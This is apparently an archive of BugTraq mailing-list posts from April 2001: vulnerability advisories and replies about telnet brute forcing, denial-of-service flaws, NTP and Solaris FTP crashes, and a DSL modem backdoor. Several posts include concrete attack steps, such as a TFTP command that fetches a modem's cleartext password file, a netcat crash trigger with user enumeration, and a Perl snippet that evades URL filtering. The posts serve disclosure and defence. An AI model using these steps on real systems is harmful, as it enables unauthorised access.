# Hack the " " problem... change " " - "\t" [TAB]
$command =~ s/%20/%09/g;

$r =

Console 3200 telnetd problem.

2001-04-11 Thread John McInnes 

Hi,

I've been testing a Lightwave ConsoleServer 3200 recently, and have
come across some potentially dangerous security weaknesses with the
firmware.

To log in to the unit, you telnet to the console server on TCP port
23 for regular user access, or 5000 for the System Administrator. When
you initiate a telnet session, you are automatically dropped to a CLI,
where you can type 'login' to start an authenticated session.

The problems that I have discovered are that the system is vulnerable
to brute force style password attacks, and that a malicous user can
glean a certain amount of information about the unit and its
enviroment without authentication of any kind. 

To be specific:

[1]

When telneting to the unit on port 23 to log in as a regular user, the
connection is immediately accepted and you are dropped to a "pre-login
prompt", where you must type 'login' to log in to the unit.

After an unsuccessfull login, you are again returned to the
"pre-login prompt" where you can again type 'login' and start over.

There are no delays associated with a failed login attempt, nor is the
TCP connection even dropped to at least make brute forcing the unit a
hassle for a malicious user. A brute force attack could be expediated
by already having a list of usernames as described in [2]. 

I could not find any configuration option to disable this behaviour,
and worse yet I could not find any way of logging such failed
attempts.

[2]

I have discovered with the ConsoleServer 3200 are that when you telnet
to the unit's System Administrator interface on TCP port 5000, you can
use the inbuilt CLI to glean information in the "pre-login mode". 

- What expansion cards are in the unit.
- Who is currently logged into the unit (allowing a malicious user to
  gather a list of users on the system). 
- What console's (serial ports) have been configured (all of the
  serial ports that have been configured have a name, commonly the
  hostname of the machine). 
- The status of the power supplies.
- Ethernet interface configuration (MAC addr, gateway, netmask).

When you make three incorrect login attempts on the System
Administrator port, the TCP connection is closed, but it seems not
logged anywhere as in [1].

This sort of information leakage is of great concern to me, and the
common belief that an unauthenticated user should not be able to get
any information at all out of a host.

If a malicous user was able to brute force a login, then he or she
could easily wreak havoc to any hosts or devices connected to the
unit, the scope of which will be left to the imagination of the reader.

My recommendation to Lightwave Com., is to change the firmware so that
upon connection to the telnet ports, you are immediatly prompted to
log in as a user, and when there are 3 or more failed login attempts
the failure is logged and the TCP connection is closed.

My recommendation to anyone that is using one of these terminal
servers is to keep it away from any internet routable network. 

Regards,
  - John

-- 
John McInnes - Email: [EMAIL PROTECTED], Phone: +61 410 422 107
  http://www.dissension.net/~john/
--
It will be advantageous to cross the great stream ... the Dragon is on
the wing in the Sky ... the Great Man rouses himself to his Work.

 PGP signature

Re: webHancer Information / BugTraq mailing list

2001-04-11 Thread Michael Merhej 

I have been trying to avoid this discussion, but I am being pulled into
it because I have a problem with people spreading false information for
the sake of attention.  If you would like to debate if Audiogalaxy should
also install the webHancer software automatically, please do, but debate
it knowing the facts.  If you have questions about how Audiogalaxy works I
will be glad to discuss this with you.  Please talk to Bruce Linton at
webHancer and I am sure he will be glad to give you the facts on how
webHancer works.  webHancer security policies have been verified by a
3rd party - Deloitte  Touche.  More information is available at:
http://www.webhancer.com/site/products/privacy/index.asp

When you download the Audiogalaxy Satellite it is clearly stated what
webHancer does and that webHancer is installed on your system along with
the Audiogalaxy Satellite.  If you do not wish this to happen do not
install the Audiogalaxy Satellite.

It looks like you have not even bothered to download the latest version
(0.605) which has been out since
the end of March.  Quoted from the readme.txt file:

"Quick break down of the install process:
*webHancer is installed on everyone's machine - it can be uninstalled by
going to
control-panel add/remove programs (webHancer reports network
latency about
websites you visit - they throw away your IP address BTW so its
anonymous)"
.
.
."

I invite you all to go and download the Audiogalaxy Satellite at
http://www.audiogalaxy.com/satellite instead of spreading rumors on this
list.

Here is an example of a company that spreads grossly false information.
If I were a client of Global Integrity I would cancel my subscription since they do
not post the facts, but send over-dramatic warnings that are not thought
through nor even researched in hopes of seeming valuable to their
customers by scaring them.

To start off - webHancer and the Audiogalaxy Satellite DOES not even
install on a Win 3.x platform.  WebHancer does not even install on a Win95
platform as I am told (Bruce this is correct?).

The statement "email addresses and other information is shared with an
information collector" is flat out false.  Audiogalaxy does not share the
email addresses it gets from the Audiogalaxy sign up process, nor has
Audiogalaxy ever used the email addresses to send any kind of mail to
those accounts.  The WebHancer software is completely separate from the
Audiogalaxy Satellite software and the two products have zero interaction
and do not exchange any kind of data.

Where does one get "read files from your hard drive and send them to its
parent company"?  This is completely untrue.  To see exactly what the
Audiogalaxy Satellite is doing in a very detailed fashion enable logging
and read the generated logv605.txt file.

The REACT advisory then continues to quote webHancer end-product
information selectively quoting specific parts.  Little known to
Global Integrity that webHancer offers several services to its clients
which utilize client data (websever logs) that is implied to
originate solely from the webHancer client data  (Bruce maybe you can step
in here with more details).

I do not mind Global Integrity issuing a statement about Audiogalaxy and
WebHancer, but it better contain facts instead of random BS meant to seem
like a valuable alert.  I think this alert brings into question the
integrity of Global Integrity itself as a company and its many "alerts".
We did not even receive a phone call from Global Integrity to discuss this
before they posted it.

REACT Advisory 2001-04-10, Trojanized program violates user privacy.
///\\\ ___
__ ___ ___ / / / /\ \ \ / / / / \ \ \ /__ / / /\ \
\ / \ / / \ \ \ / \ / / \ \ \ / \ /__ / \ \___ \ Predictive
Systems Rapid Emergency Action Crisis Team SECURITY ADVISORY This is an
automated advisory from the Predictive Systems REACT advisory service.
Please do not reply to this message as it was sent from an automated
mailbox. Comments or questions about this specific advisory should be
addressed to [EMAIL PROTECTED] 2001-04-10
/// \\
SUBJECT: Trojanized program violates user privacy. RISK FACTOR: 3 RISK
FACTOR EXPLANATION: Information on users surfing habits, server ID, OS,
platform, Email addresses and other information is shared with an
information collector. IMPACT: Release of this type of information could
contribute to a loss of corporate and personal information that could then
be used for other purposes. SUMMARY: The AudioGalaxy Satellite is a small
and simple program that allows you to share your music with friends and
other users on AudioGalaxy. Part of the install program is an additional
tool called WebHancer this program tracks the user's usage of the
Internet. PLATFORMS AFFECTED: Workstations,Web Clients Hardware: Operating
Systems: Windows NT,Windows 3.x,Windows 9x,Windows

[RHSA-2001:046-03] New netscape packages available

2001-04-11 Thread bugzilla 

-
   Red Hat, Inc. Red Hat Security Advisory

Synopsis:  New netscape packages available
Advisory ID:   RHSA-2001:046-03
Issue date:2001-04-09
Updated on:2001-04-10
Product:   Red Hat Linux
Keywords:  netscape gif comment
Cross references:  
Obsoletes: 
-

1. Topic:

New netscape packages are availabe to fix a problem with the handling of
JavaScript in certain situations. By exploiting this flaw, a remote site
could gain access to the browser history, and possibly other data.

It is recommended that all users upgrade to the fixed packages.

2. Relevant releases/architectures:

Red Hat Linux 6.2 - alpha, i386

Red Hat Linux 7.0 - alpha, i386

3. Problem description:

Netscape does not escape GIF file comments in the image information page;
this allows JavaScript commands embedded therein to be executed. These
commands could access data such as the browser history.

Credit goes to Florian Wesch [EMAIL PROTECTED] for discovering the
vulnerability, and to Netscape for providing fixed packages.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which are
not installed but included in the list will not be updated.  Note that you
can also use wildcards (*.rpm) if your current directly *only* contains the
desired RPMs.

Please note that this update is also available via Red Hat Network.  Many
people find this an easier way to apply updates.  To use Red Hat Network,
launch the Red Hat Update Agent with the following command:

up2date

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):



6. RPMs required:

Red Hat Linux 6.2:

SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-4.77-0.6.2.src.rpm
ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-alpha-4.77-0.6.2.src.rpm

alpha:
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-common-4.77-0.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-communicator-4.77-0.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-navigator-4.77-0.6.2.alpha.rpm

i386:
ftp://updates.redhat.com/6.2/en/os/i386/netscape-common-4.77-0.6.2.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/netscape-communicator-4.77-0.6.2.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/netscape-navigator-4.77-0.6.2.i386.rpm

Red Hat Linux 7.0:

SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-4.77-1.src.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-alpha-4.77-1.src.rpm

alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-common-4.77-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-communicator-4.77-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-navigator-4.77-1.alpha.rpm

i386:
ftp://updates.redhat.com/7.0/en/os/i386/netscape-common-4.77-1.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/netscape-communicator-4.77-1.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/netscape-navigator-4.77-1.i386.rpm



7. Verification:

MD5 sum   Package Name
--
1fde261c2376c8d210f6d72d23ad4de6 6.2/en/os/SRPMS/netscape-4.77-0.6.2.src.rpm
71b4f8c9d9cb39df21a6d99e0c062b80 6.2/en/os/SRPMS/netscape-alpha-4.77-0.6.2.src.rpm
0190f8439a1507165230f328dfe46ba2 6.2/en/os/alpha/netscape-common-4.77-0.6.2.alpha.rpm
a571ee08b6b44aa4cbc3b98b6bef646c 
6.2/en/os/alpha/netscape-communicator-4.77-0.6.2.alpha.rpm
304df2ab2e6f052a0e6bb432dd6f0afe 
6.2/en/os/alpha/netscape-navigator-4.77-0.6.2.alpha.rpm
a2a5adb4500d667265a34fb99b59c37c 6.2/en/os/i386/netscape-common-4.77-0.6.2.i386.rpm
9f439fa9e54ea82b37c1a3aa7c49d032 
6.2/en/os/i386/netscape-communicator-4.77-0.6.2.i386.rpm
b0970903ea25f2fe73c8d66afb9218cb 6.2/en/os/i386/netscape-navigator-4.77-0.6.2.i386.rpm
400709093733a7ccf90da78d179daeb1 7.0/en/os/SRPMS/netscape-4.77-1.src.rpm
29b80daa27fdad309a68f8101830e863 7.0/en/os/SRPMS/netscape-alpha-4.77-1.src.rpm
a0fbb89d2dfb86c432f1d190e38981f3 7.0/en/os/alpha/netscape-common-4.77-1.alpha.rpm
05859fefa5d8cd3b02d2c768b614490b 7.0/en/os/alpha/netscape-communicator-4.77-1.alpha.rpm
d0681b896b1fee8d5f1783274f4b1f64 7.0/en/os/alpha/netscape-navigator-4.77-1.alpha.rpm
4bb1bcc4c439531019bcab78cd953f59 7.0/en/os/i386/netscape-common-4.77-1.i386.rpm
7d6948941a20599b302bc0bc4f1c0999 7.0/en/os/i386/netscape-communicator-4.77-1.i386.rpm
7d570955357ad6b8fbb9d9fd4913d5cf 7.0/en/os/i386/netscape-navigator-4.77-1.i386.rpm

These packages are GPG signed by Red Hat, Inc. for

Re: multiple vulnerabilities in Alcatel Speed Touch DSL modems

2001-04-11 Thread Tom Perrine 

We were not interested in denial of service issues, only software
flaws that permit an abuser to take control of or modify the device.

Then we became interested in the EXPERT mode that cannot be turned
off.

Lots of stupid things can't handle weird packets.

--tep

--
Tom E. Perrine ([EMAIL PROTECTED]) | San Diego Supercomputer Center
http://www.sdsc.edu/~tep/ | Voice: +1.858.534.5000
"Libertarianism is what your mom taught you: 'Behave yourself
and don't hit your sister."' - Kenneth Bisson of Angola, Ind.

def-2001-20: Lotus Domino Multiple DoS

2001-04-11 Thread Peter Gründl 

==
  Defcom Labs Advisory def-2001-20

 Lotus Domino Multiple DoS

Author: Peter Grndl [EMAIL PROTECTED]
Release Date: 2001-04-11
==
=[Brief Description]=-
The Lotus Domino Web Server contains multiple flaws that could allow an
attacker to cause a Denial of Service situation.

=[Affected Systems]=--
- All releases of Lotus Domino R5 prior to 5.0.7, for all platforms

--=[Detailed Description]=
HTTP Header DoS:
Affected headers are "Accept", "Accept-Charset", "Accept-Encoding",
"Accept-Language" and "Content-Type". Unique values sent with these
headers are not freed properly. This means that by repeatedly
requesting eg. document root (/) with various accept fields
(accept: a, accept: aa, accept: aaa aso.) will eventually result in
the server running out of physical memory and the server will display
a message similar to this one:

"HTTP Server: Could allocate 8036 bytes of memoryOut of memory in
 HTMemPoolAlloc (file htmpool.c, line 506).Program aborted."

and one of two things will happen then:

1) The Lotus Server will continue to run (although it no longer answers
on TCP port 80), and no function that needs a working thread will work
(this includes task manager, as the parser process is preventing other
processes from requesting a thread). The occupied memory will not be
released.

2) The Lotus Server process will crash, and will need a restart in
order to regain functionality. The rest of the services, unrelated to
the Lotus Server, on the host will continue to function.


Unicode DoS:
Sending certain combinations of unicode chars (16 bit) to the server in
a GET request triggers a server exception that will crash the Domino
server.

eg. GET /190xchr(430) HTTP/1.0

If qnc.exe is removed from the system, the crash will only affect the
web server.


DOS-device DoS:
!!!This Denial of Service only affects Windows and OS/2 platforms!!!
You can access DOS-devices through the web server, and if this is done
through the cgi-bin directory, a ncgihttp.exe process will be opened to
handle the execution of eg. con. This processing will not finish and
when approx. 400 of these requests have been made, the server will no
longer answer requests to tcp port 80.


CORBA DoS:
A continous stream of connects with a payload of 10K data followed by
return to TCP port 63148 (DIIOP - CORBA) results in the CPU on the
target host jumping to 100% and the memory slowly filling up, and the
harddisk being written to constantly during the attack. The CPU
usage will continue to remain at 100% long after the attack is over.


URL parsing:
Big HTTP requests (8k) to TCP port 80 of /'s result in a lot of CPU
consumption (99-100%) opposed to eg. 8k of a's that result in approx.
1% CPU usage.

---=[Workaround]=-
Download and upgrade to Notes/Domino 5.0.7:
http://www.notes.net/qmrdown.nsf/QMRWelcome

-=[Vendor Response]=--
The need for improved parsing and the CORBA issue were brought to the
vendors attention on the 9th of November, 2000.

The header-DoS was brought to the vendors attention on the 1st of
December, 2000.

The Unicode DoS and the DOS-device issues were brought to the vendors
attention on the 9th of January, 2001.

The URL parsing algorithm was improved in Lotus Domino 5.0.6, and the
remaining three issues were fixed with the release of QMR 5.0.7.

The DOS-device issue was also discovered by Lotus internal testing!

==
This release was brought to you by Defcom Labs

  [EMAIL PROTECTED] www.defcom.com
==

flaw in RH ``mkpasswd'' command

2001-04-11 Thread Shez 

Hey,
The mkpasswd password generator that ships in the ``expect'' package of (at
least RedHat 6.2) generates only a relatively small number (2^15 for the
default password length) of passwords.  Presumably this is a result of trying
to apply too many rules of what is a ``good'' password to the generation
process.

Simple test:
while [ 1 ] ; do mkpasswd  /tmp/shez/passwords ; done
sleep 16000 # this is long enough to demonstrate enough on my machine
wc -l /tmp/shez/passwords
113544
sort -u /tmp/shez/passwords | wc -l
32193

IIRC I reported this to redhat last year some time.

Cheers
Shez

P.S.
Apologies if you've seen this already, I couldn't see anything in the
archives on it but I've not been onn bugtraq for a while now.

Re: ntp-4.99k23.tar.gz is available

2001-04-11 Thread Dick St.Peters 

  Has anyone tested the exploit against embedded ntp implementations
  such as in Cisco router, for example, to see
  if the daemon would misbehave, etc.?

 Cisco has said they are aware of the advisories and investigating the
 issue. That's all I know. I do not have a convenient sacrificial Cisco
 box at the moment... but I probabaly should go set one up for this
 and other games.

I tried the exploit against a cisco 2614/IOS 10.3 and a cisco 3640/IOS
12.0 when the exploit first came out, and there was no evidence of any
effect.

Since April 7 I've been running ntpd/4.99k23 on an assortment of Linux
systems and on a pair of antique Sparc 2's running SunOS 4.1.3.  All
seem happy, are keeping good time, and are unaffected by the exploit.

--
Dick St.Peters, [EMAIL PROTECTED]

def-2001-21: Ghost Multiple DoS

2001-04-11 Thread Peter Gründl 

==
  Defcom Labs Advisory def-2001-21

 Ghost Multiple DoS

Author: Peter Grndl [EMAIL PROTECTED]
Release Date: 2001-04-11
==
=[Brief Description]=-
Ghost contain flaws that allow an attacker to crash the application.

=[Affected Systems]=--
- Symantec Ghost 6.5 for Windows NT/2000
- Sybase Adaptive Server Anywhere Database Engine V6.0.3.2747

--=[Detailed Description]=
The first flaw involves the database engine, which isn't a Symantec
product, but it is shipped with Symantec Ghost 6.5 (and possibly older
versions as well). The database engine is the run-time engine by
Sybase.

Connecting to the database engine on tcp port 2638 and sending a
string of approx. 45Kb will cause a buffer overflow that results in
registers being overwritten. The database engine needs to be restarted
in order to regain functionality.

"State Dump for Thread Id 0x5c8
 eax=0063f0e4 ebx=0063f204 ecx=41414141 edx=41414141 esi=00630020
 edi=0063 eip=65719224 esp=08fbfbf0 ebp=
 iopl=0 nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=  efl=00010206"

The Ghost Configuration Server is running on TCP port 1347. It is
periodically vulnerable to crash triggered the same way as the
database engine overflow. This is not a buffer overflow, and can only
be used as a DoS attack.

"The following information has been placed on the clipboard.
 If you would like to visit the Symantec Technical support site at
 http://www.symantec.com/techsupp/ it may help our technicians
 diagnose the problem and improve our product.

 Symantec Ghost Configuration Server
 An exception has occurred of type c005
 D:\Program Files\Symantec\Ghost\ngserver.exe 6.5.1.144
 [ Limited backtrace only ]
 memmove+0x33
 StreamInterchange::doDispatch+0x1b2
 StreamInterchange::readEvent+0x13e
 SocketEvent::dispatch+0x33
 SocketEvent::wait+0x203"

---=[Workaround]=-
Restricting access to the Ghost Configuration Server might not be
applicable, since you would need that access in order to use the net
capabilities of the program.

The database engine can be restricted to listening on the loopback
interface like so:

1. shut down the configuration server
2. launch the Sybase engine manually:
cd "\Program Files\Symantec\Ghost\bin"
rteng6 -x tcpip(MyIP=127.0.0.1) ..\db\SYMANTECGHOST.DB
 (or the equivalent before restarting the Symantec Ghost
  Configuration Server service)

Vendor reponse regarding upgrade:
"1 - Ghost 7.0 ships out to customers on the 2nd of April
 2 - It is a "free" upgrade for those who purchased Upgrade Insurance
 as part of their license
 3 - Standard upgrade procedures are available for those affected by
 the problem

 Direct all inquires to www.symantec.com/ghost and/or
 www.binaryresearch.net"

-=[Vendor Response]=--
The issues were brought to the vendors attention on the 21st of
December, 2000. The issues were resolved in Ghost 7.0, released 2nd of
April, 2001.

In response to the DoS on the Configuration Server port (1347) the
vendor replied:

"Just an FYI on the defect; it's not a buffer overflow as such (we're
 pretty religious about avoiding fixed-size buffers here), but rather
 a simple fencepost bug which is triggered by an error-handling path
 where the code at one layer that consumed some input fell over
 because a lower-layer error function had already cleaned out the
 buffer."

==
This release was brought to you by Defcom Labs

  [EMAIL PROTECTED] www.defcom.com
==

Re: ntp-4.99k23.tar.gz is available

2001-04-11 Thread Chuck D. Phillips 

William D. Colburn (aka Schlake) writes:
  I haven't seen an announcement anywhere, but I noticed it on the FTP
  server this morning.  It is dated Friday evening.
 
  ftp://ftp.udel.edu/pub/ntp/ntp4/ntp-4.0.99k23.tar.gz
 
  I tried it out with the exploit posted by "babcia padlina
  ltd. [EMAIL PROTECTED]" and it seems to be safe.  I never had
  a machine that the exploit worked against, but my ntp servers would exit
  with a segfault when it was run against them.  The new server does not
  exit.

FWIW, I downloaded Redhat's patched source RPM and compared the against
ntp-4.0.99k23.  While this *particular* exploit appears to be fixed, there
are some other buffer overflows that are not fixed by k23 that are fixed in
the Redhat patches, in particular the use of vsnprintf instead of vsprintf.
Then again, the Redhat version may not catch all of these, either.  I
didn't think to check at the time.

ftp://updates.redhat.com/7.0/en/os/SRPMS/ntp-4.0.99k-15.src.rpm

...or just grep the k23 source for vsprintf.  Once you think to look, the
fixes are pretty obvious.


# find ntp-4.0.99k23 -name \*.c | xargs grep vsprintf
./libntp/snprintf.c:rp = vsprintf(str, fmt, ap);
./libntp/snprintf.c:rval = vsprintf(str, fmt, ap);
./libntp/snprintf.c:return (strlen(vsprintf(str, fmt, ap)));
./libntp/snprintf.c:return (vsprintf(str, fmt, ap));
./libntp/msyslog.c: vsprintf(buf, nfmt, ap);
./ntpd/refclock_mx4200.c:   (void)vsprintf(cp, fmt, ap);
./ntpdate/ntpdate.c:vsprintf(
./ntpdate/ntptimeset.c:int  vsprintfP((char *str, const char *fmt, va_list 
ap));
./ntpdate/ntptimeset.c:vsprintf(
./ntptrace/ntptrace.c:vsprintf(


FWIW, the Redhat version also syslog()s attempts to use the published
exploit.  Hmmm.  Perhaps a DoS is next for the "fixed" version.
:-) / 2

Hope this helps,
Chuck

Re: PIX Firewall 5.1 DoS Vulnerability

2001-04-11 Thread Hugo van der Kooij 

On Tue, 10 Apr 2001, Siddhartha Jain wrote:

 Could this vulnerability exist in other Cisco products using TACACS+ for
 authentication? For eg. Cisco routers?

PIX code is maintained seperatly from IOS code AFAIK.

Hugo.

--
Alle email aan mij verzonden is gebonden aan de regels beschreven op
mijn homepage.
All email send to me is bound to the rules described on my homepage.

Hugo van der Kooij; Oranje Nassaustraat 16; 3155 VJ  Maasland
[EMAIL PROTECTED]http://hvdkooij.xs4all.nl/

Don't meddle in the affairs of sysadmins,
for they are subtle and quick to anger.

Re: Catastrophic failure of Strip password generation.

2001-04-11 Thread Andreas Heinlein 

--On Dienstag, 10. April 2001 20:05 Uhr +0200 Thomas Roessler
[EMAIL PROTECTED] wrote:

-BEGIN PGP SIGNED MESSAGE-

 Executive summary: If you have ever used Strip for the Palm to
 generate your passwords, change them.  Change them NOW.

Hi,

I think you forgot to mention the attacker has to know you generated
the passwords with Strip...

Not likely in many cases, I think.

Bye,
Andreas

-BEGIN PGP SIGNATURE-
Version: PGPfreeware 6.5.8 for non-commercial use http://www.pgp.com

iQEVAwUBOtRQ0dep+fmEt3d7AQGMTQgAxZbbniH06Tv4WNoeEdsbPd+eoHC7rEHr
gvurNaOs7DmGtFPlU9sEfpgNgT3/JDxJ7StsuuSLALR/8OqN84BRtdbSBwuyBMIb
OCblnjObE4P0HH55OjAgQJflYpwN5cKJuUGCEb7T+LuqTREIgKFNP5xBiBJP4RPw
bFLwkhFRF/h58Q3dNMBdMghMuJsLGy6c1Y2nOl3bZODUnCER18KnfKcn1vf0lv22
tt6ta7gEm2y+u+NJ9ltcHnXXgm4MN6wTlDPbzhrf6rnhr8/hJvAvuWSwrqagoqlT
Ha+1IBBnj5F8EpaE2uB+Rf3Oiek5kwu9LE1lpG0Q/k5aQoS6r2ilEw==
=0Q9e
-END PGP SIGNATURE-

Re: Solaris Xsun buffer overflow vulnerability

2001-04-11 Thread Leif Sawyer 

 From: eEye Digital Security [mailto:[EMAIL PROTECTED]]
 Solaris Xsun buffer overflow vulnerability

 Discovered and exploited by:
 Riley Hassell [EMAIL PROTECTED]

 Release Date:
 April 10, 2001

 Systems Affected:
 Solaris 7/8 (x86 and sparc)

 Description:
 Yet some more Solaris spring cleaning...

 A buffer overflow was discovered in Xsun. Since Xsun is SUID root,
 exploiting this vulnerability yields root privileges. The

Hmm.

Just a quick check on a couple of the boxen that I've got access to:

(historical reference)
root@okmok uname -r
5.5.1
root@okmok dir `which Xsun`
-rwxr-s-r-x   1 root root 729792   Jan 26 21:20
/usr/openwin/bin/Xsun

root@foraker uname -r
5.6
root@foraker dir `which Xsun`
-rwxr-s-r-x   1 root root 916792   May 5   2000
/usr/openwin/bin/Xsun

root@wormhole uname -r
5.8
root@wormhole dir `which Xsun`
-rwxr-s-r-x   1 root root 1941644  Dec 15  1999
/usr/openwin/bin/Xsun

My Solaris 8 only seems to have the following patches:
root@wormhole showrev -p | awk '{print $1 $2}'
Patch:108131-03
Patch:108132-03

Don't have a Solaris 7 box to check.  Not sure why your Solaris 8 has
a SUID Xsun install, either.

Leif

Re: Console 3200 telnetd problem.

2001-04-11 Thread Rich Teer 

On Wed, 11 Apr 2001, John McInnes wrote:

 My recommendation to Lightwave Com., is to change the firmware so that
 upon connection to the telnet ports, you are immediatly prompted to
 log in as a user, and when there are 3 or more failed login attempts
 the failure is logged and the TCP connection is closed.

I would further recommend to Lightwave Communications that they implement
an SSH interface(s) on these products too, to prevent packet sniffing.

--
Rich Teer

President,
Rite Online Inc.

Voice: +1 (250) 979-1638
URL: http://www.rite-online.net

R: multiple vulnerabilities in Alcatel Speed Touch DSL modems

2001-04-11 Thread Stefano Chiccarelli 

 This advisory addresses the Speed Touch family of devices, and similar
 devices apparently based on related code such as the older Alcatel
 1000 ADSL Network Termination device (1000 ADSL).  All testing was
 performed on the "Speed Touch Home", and limited testing was performed
 on the 1000 ADSL.  It is strongly suspected that the "Speed Touch Pro"
 software is at least very similar to that in the Speed Touch Home, so
 it is probable that the Pro is vulnerable to similar attacks.  Other
 members of the family running software derived from the same code base
 would also be expected to share these vulnerabilities.

First of all, I can confirm that even the Speed Touch Pro router is affected
by the same problem.
I even found that the speed touch PRO router bundled with the NetEcomomy
ADSL group/multigroup offered by  Telecom Italia, that work in CIP
(Classical IP) mode (so with a  PUBLIC IP) is subject to remote attacke if
firewalling off/on configuration has been disabled on the ATM interface

This feature can be disabled from the CLI interface,  telnetting on the
router
with the command  "ipconfig firewalling off".

At this point, the TFTP without authentication can be used by a remote
attacker straight on the TCP/IP protocol
(i.e. there is no need to be "located" on the ATU-C)

tftp -i ip GET active/system.ini

wth this command, an attacker can "fetch" the password stored inside this
file (in a non encrypted form)
This is an "add-on" to the backdoor discovered by Tom Perrine e Tsutomu
Shimomura.

Please remark that a lot of people may have disabled this feature to be
allowed to remote admin jobs, pinging and so on,

Furhter more, the PRO firmware called build134.134 is the same than HOME,
called KHDSAA.134
I tried - succesfully - to run the  build134.134 on an HOME and all worked
fine.
Just CIP PPP and NAT features implemented on the PRO model don't are
"enabled" by the home (I suspect for hardware reasons that I'm sill
investingating)



-
Stefano "NeURo" Chiccarelli
Metro Olografix Association
[EMAIL PROTECTED])

Chief security officer for:
- Studio Legale Monti
- Nuova Newtel s.r.l.

65126(PESCARA,Italy)
Tel: 39+085 44825267 fax: 39+085 44825280

Re: ntp-4.99k23.tar.gz is available

2001-04-11 Thread Fyodor 

On Tue, Apr 10, 2001 at 11:49:28AM -0400, stanislav shalunov wrote:
 Chiaki Ishikawa [EMAIL PROTECTED] writes:

  Has anyone tested the exploit against embedded ntp implementations
  such as in Cisco router, for example, to see if the daemon would
  misbehave, etc.?

 I couldn't do anything to the NTP implementation of a Cisco router
 here with the stock "ntpdx" exploit as it was posted.  (It doesn't
 crash, it doesn't exhibit same heap corruption as xntpd v3.)


Cisco IOS (at least 11.x series) _IS_ vulnerable (tested, confirmed). Earlier
versions are presumably vulnerable too. Haven't tested IOS 12.x but it may have
the same bug inherited as well (unless cisco folks found the problem and fixed
it silently).

Hope it helps...


-Fyodor
--
http://www.notlsd.net
PGP fingerprint = 56DD 1511 DDDA 56D7 99C7  B288 5CE5 A713 0969 A4D1

SUN SOLARIS 5.6/5.7 FTP Globbing Exploit !

2001-04-11 Thread Johnny Cyberpunk 

Hi,

i've tested these globbing vulnerability on two different SPARC Solaris
Machines.
One with 5.6 and one with 5.7

i've started Netcat from a Win2K box to Port 21.

C:\nc 10.64.224.3 21
220 gsmms0 FTP server (SunOS 5.6) ready.
cwd ~
530 Please login with USER and PASS.

C:\

As you can see. Without being logged on, i'm landing on the prompt again
after putting out the cwd ~ command.

Then i've connected via SSH to my Solaris box and saw a fresh CORE File
created in / .

Then i've started : gdb /usr/sbin/in.ftpd /core which gives me the following
information :

Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(no debugging symbols found)...
Core was generated by `in.ftpd'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /usr/lib/libcmd.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols
found)...
done.
Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libbsm.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols
found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-250/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0  0xff1b6dd0 in strcpy () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff1b6dd0 in strcpy () from /usr/lib/libc.so.1
#1  0x1648c in glob ()
#2  0x162e8 in glob ()
#3  0x161d4 in glob ()
#4  0x19884 in yyparse ()
#5  0x13a90 in main ()
(gdb)

As you see a segment fault has happened. After that i've typed in the bt
command
to get more info about the segment fault. in offset 0xff1b6dd0 the
strcpy() command failed and produced the segment fault.

This Problem could allow an attacker to execute code on the stack and gain
access to the system.

Another nice effect is the following :

C:\nc 10.64.224.3 21
220 gsmms0 FTP server (SunOS 5.6) ready.
cwd ~netadm
530 Please login with USER and PASS.
cwd ~xyz
530 Please login with USER and PASS.
550 Unknown user name after ~

As you see cwd ~netadm just produces a normal 530 message, coz this user
exists on the system. the user xyz user doesn't exist and prints out a 550
Unknown user name after ~

This could being used to brute force existing users on the remote system.

I saw the same effects on a SPARC Solaris 5.7 box.

When i have some more time available i'll write a proof of concept code to
exploit this vulnerability, that executes a /bin/sh on the stack.

cheers

Johnny Cyberpunk ( [EMAIL PROTECTED] )